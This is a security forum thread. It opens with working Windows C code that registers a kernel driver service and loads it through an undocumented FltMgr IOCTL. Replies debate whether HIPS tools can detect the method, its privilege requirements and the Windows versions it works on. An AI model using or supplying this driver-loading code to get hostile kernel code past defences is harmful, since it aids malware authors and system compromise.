[__Genius__]

Author : Sav1or [ Russian Federation ]

Code: Select all

#include<stdio.h>
#include<windows.h>

typedef struct _tagLOAD
{
	WORD Len;
	WCHAR ServiceName[512];
} LOAD , *PLOAD;

#define MAGIC_IOCTL 0x00088004 


VOID WINAPI make_reg( LPWSTR szDriverName, LPWSTR szDriverPath )
{
	
	DWORD dwType = SERVICE_KERNEL_DRIVER;  
	DWORD dwStart = SERVICE_DEMAND_START;  
	HKEY hKey;
	WCHAR szMain[512] = {0};
	WCHAR szImgPath[512] = {0};
	wchar_t szRegPath[512]={0};
	
	wsprintfW( szMain, 
		L"%s%s",
		L"SYSTEM\\CurrentControlSet\\Services\\",
		szDriverName );
	
	wsprintfW( szImgPath,
		L"%s%s",
		L"\\??\\", 
		szDriverPath);
	  
	if( RegCreateKeyW( HKEY_LOCAL_MACHINE, szMain, &hKey ) == ERROR_SUCCESS ) 
	{
		RegSetValueExW( hKey, 
			L"DisplayName", 
			0, 
			REG_SZ, 
			(LPBYTE)szDriverName, 
			(DWORD)lstrlenW(szDriverName)*2);
		
		RegSetValueExW( hKey, 
			L"ImagePath", 
			0, 
			REG_EXPAND_SZ,
			(LPBYTE)szImgPath, 
			(DWORD)lstrlenW(szImgPath)*2);
		
		RegSetValueExW( hKey, 
			L"Type",
			0,
			REG_DWORD,
			(LPBYTE)&dwType,
			(DWORD)sizeof(dwType) );
		
		RegSetValueExW( hKey, 
			L"Start",
			0,
			REG_DWORD,
			(LPBYTE)&dwStart,
			(DWORD)sizeof(dwStart) );
		
	} 	
}


int main( int argc , char *argv[] )
{
	HANDLE hDevice;
	LOAD service_to_load;
	BOOL err;
	DWORD dwRet=0;
	WCHAR drvPath[512];

	memset( drvPath , 0 , 512 );
	GetCurrentDirectoryW( MAX_PATH , drvPath );
	lstrcatW( drvPath , L"\\load.sys" );
	make_reg( L"load" , drvPath );
	hDevice = CreateFile ("\\\\.\\FltMgr" , GENERIC_READ | GENERIC_WRITE , FILE_SHARE_READ | FILE_SHARE_WRITE , NULL , OPEN_EXISTING , FILE_ATTRIBUTE_NORMAL , NULL );
	if( hDevice == INVALID_HANDLE_VALUE )
	{
		printf("CreateFile failed with status : %d\n" , GetLastError() );
		goto __end;
	}

	wcscpy( service_to_load.ServiceName , L"load");
	service_to_load.Len = wcslen( service_to_load.ServiceName )*sizeof(WCHAR);
	err = DeviceIoControl( hDevice , MAGIC_IOCTL , &service_to_load , sizeof(service_to_load) , NULL , 0 , &dwRet , NULL );
	if( !err )
	{
		printf("sorry\n");
		goto __end;
	}
	printf(":)\n");

__end:

	CloseHandle( hDevice );
	return 0;
}

This will load the driver with the help of FltMgr Driver .
original post

[Alex]

Source codes like this shouldn't be published because this helps only malware writers, but if someone decided to disclose this method there is no way back. Does anyone know malware which use this funny method? This method like in NtLoadDriver service case requires SE_LOAD_DRIVER_PRIVILEGE privilege so it isn't nothing special.

Alex

[EP_X0FF]

I believe any sophisticated HIPS will catch this because of notify routines and file system filters. This IOCTL btw does not work for Vista/7.
Personally I didn't saw this technique in malware samples I've analyzed.
Currently they actively copy-pasting TDL3 loading scheme and because it was posted at rootkit.com article as ready to copy example :)

[sww]

I've analyzed xp sp3, windows 7 and vista x64. They are all contains that code.

[EP_X0FF]

Damn it you are right :D
It is working on Vista SP2 in my test application. Just takes some time.

[sww]

You're still need of SeLoadDriver privilege set :)